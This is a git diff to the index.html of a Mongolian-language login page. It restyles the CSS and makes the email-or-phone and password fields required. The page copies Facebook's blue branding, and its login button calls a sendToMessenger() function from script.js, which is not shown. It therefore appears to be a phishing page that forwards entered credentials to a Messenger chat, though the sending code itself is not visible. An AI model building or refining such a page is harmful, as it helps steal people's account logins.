--- a/index.html
+++ b/index.html
@@ -7,33 +7,32 @@
     <style>
         body {
             font-family: Arial, sans-serif;
-            background: #f0f2f5;
+            background-color: #e9eff1;
             display: flex;
-            flex-direction: column;
-            align-items: center;
             justify-content: center;
+            align-items: center;
             height: 100vh;
             margin: 0;
         }
         .login-container {
             background: white;
-            padding: 20px;
-            width: 360px;
+            padding: 40px;
+            width: 400px;
             border-radius: 8px;
-            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
+            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
             text-align: center;
         }
         .login-container h2 {
             font-size: 24px;
-            margin-bottom: 20px;
             color: #1877f2;
+            margin-bottom: 20px;
         }
         input {
             width: 100%;
             padding: 12px;
             margin: 10px 0;
             border: 1px solid #ddd;
-            border-radius: 6px;
+            border-radius: 5px;
             font-size: 16px;
         }
         .login-btn {
@@ -42,10 +41,11 @@
             background: #1877f2;
             color: white;
             border: none;
-            border-radius: 6px;
+            border-radius: 5px;
             font-size: 18px;
             cursor: pointer;
             font-weight: bold;
+            transition: background 0.3s;
         }
         .login-btn:hover {
             background: #166fe5;
@@ -56,12 +56,11 @@
 
     <div class="login-container">
         <h2>Нэвтрэх</h2>
-        <input type="text" id="username" placeholder="Имэйл эсвэл утасны дугаар">
-        <input type="password" id="password" placeholder="Нууц үг">
+        <input type="text" id="username" placeholder="Имэйл эсвэл утасны дугаар" required>
+        <input type="password" id="password" placeholder="Нууц үг" required>
         <button class="login-btn" onclick="sendToMessenger()">Нэвтрэх</button>
     </div>
 
     <script src="script.js"></script>
-
 </body>
 </html>
